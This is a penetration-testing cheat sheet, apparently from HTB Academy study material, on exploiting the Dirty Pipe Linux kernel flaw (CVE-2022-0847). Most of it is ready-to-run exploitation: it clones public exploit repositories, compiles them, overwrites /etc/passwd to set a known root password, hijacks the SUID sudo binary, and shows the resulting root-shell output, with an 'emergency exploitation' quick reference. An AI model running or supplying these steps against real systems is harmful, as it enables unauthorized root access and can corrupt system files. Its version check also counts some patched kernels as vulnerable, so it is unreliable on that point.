💧Dirty Pipe

🎯 Overview

Dirty Pipe kernel vulnerability allows unauthorized writing to root-owned files through pipe mechanism exploitation, similar to Dirty Cow but affecting newer kernels (5.8-5.17).

🚨 CVE-2022-0847 Details

Vulnerability Info

• Impact: Write to arbitrary files as root with only read access

• Affected Kernels: 5.8 to 5.17 (including Android)

• Mechanism: Pipe-based unidirectional communication exploitation

• Similar to: Dirty Cow (CVE-2016-5195) but different attack vector

Kernel Version Check

# Check vulnerable kernel version
uname -r
# Vulnerable: 5.8.x - 5.17.x

# Examples of vulnerable versions:
# 5.13.0-46-generic
# 5.15.0-25-generic
# 5.16.x-x-generic

🚀 Exploitation

Download and Compile Exploits

# Download Dirty Pipe exploits
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits

# Compile both exploits
bash compile.sh
# Creates: exploit-1, exploit-2

Method 1: /etc/passwd Modification

# Exploit-1 modifies /etc/passwd to remove root password
./exploit-1

# Output:
# Backing up /etc/passwd to /tmp/passwd.bak ...
# Setting root password to "piped"...
# Password: [enter "piped"]
# Restoring /etc/passwd from /tmp/passwd.bak...
# Done! Popping shell...

# Root shell obtained
id
# uid=0(root) gid=0(root) groups=0(root)

Method 2: SUID Binary Hijacking

# Find SUID binaries
find / -perm -4000 2>/dev/null | head -10

# Execute exploit-2 with SUID binary path
./exploit-2 /usr/bin/sudo

# Output:
# [+] hijacking suid binary..
# [+] dropping suid shell..
# [+] restoring suid binary..
# [+] popping root shell.. (dont forget to clean up /tmp/sh ;))

# Root shell obtained
id
# uid=0(root) gid=0(root) groups=0(root)

🔧 Alternative Exploits

Other Dirty Pipe PoCs

# Additional implementations
git clone https://github.com/febinrev/CVE-2022-0847-DirtyPipe-Exploit.git
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git

# Compile and execute
gcc -o dirtypipe exploit.c
./dirtypipe

Manual File Modification

# Basic concept - write to read-only files
# Requires understanding of pipe mechanics
# Advanced exploitation technique

🔍 Detection & Enumeration

Dirty Pipe Vulnerability Check

#!/bin/bash
echo "=== DIRTY PIPE VULNERABILITY CHECK ==="

kernel_version=$(uname -r | cut -d'-' -f1)
echo "Kernel version: $kernel_version"

# Check if kernel version is in vulnerable range
if echo "$kernel_version" | grep -qE "^5\.(8|9|10|11|12|13|14|15|16|17)\."; then
    echo "[!] VULNERABLE to CVE-2022-0847 (Dirty Pipe)"
    echo "Affected range: 5.8.x - 5.17.x"
    echo "Download: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git"
else
    echo "[-] Not vulnerable to Dirty Pipe"
fi

echo "[+] Checking for gcc compiler:"
which gcc 2>/dev/null && echo "Compiler available for exploit compilation"

Quick Kernel Check

# One-liner vulnerability check
uname -r | grep -qE "^5\.(8|9|10|11|12|13|14|15|16|17)\." && echo "VULNERABLE to Dirty Pipe" || echo "Not vulnerable"

🔑 Quick Reference

Immediate Checks

# Kernel version vulnerability
uname -r | grep -E "^5\.(8|9|10|11|12|13|14|15|16|17)\."

# Compiler availability
which gcc g++

Emergency Exploitation

# Quick Dirty Pipe exploitation
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh

# Method 1: passwd modification
./exploit-1
# Password: piped

# Method 2: SUID hijacking  
./exploit-2 /usr/bin/sudo

HTB Academy Example

# 1. Connect to target
ssh htb-student@target

# 2. Check kernel version
uname -r
# Verify: 5.8.x - 5.17.x

# 3. Download and compile
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh

# 4. Execute exploit
./exploit-1  # or ./exploit-2 /usr/bin/sudo

# 5. Get root shell and read flag
cat /root/flag.txt

⚠️ Exploit Considerations

Dirty Pipe Characteristics

• Kernel-level vulnerability - Direct kernel exploitation

• High reliability - Works on most affected systems

• File corruption risk - Can damage system files

• Cleanup required - exploit-2 creates /tmp/sh

Limitations

• Specific kernel range - Only 5.8-5.17

• Compilation needed - Requires gcc on target

• Modern systems patched - Fixed in newer kernels

• Detection possible - Kernel module monitoring

---

Dirty Pipe (CVE-2022-0847) exploits kernel pipe mechanisms for arbitrary file writes - any user can modify root-owned files, leading to immediate privilege escalation on vulnerable kernel versions.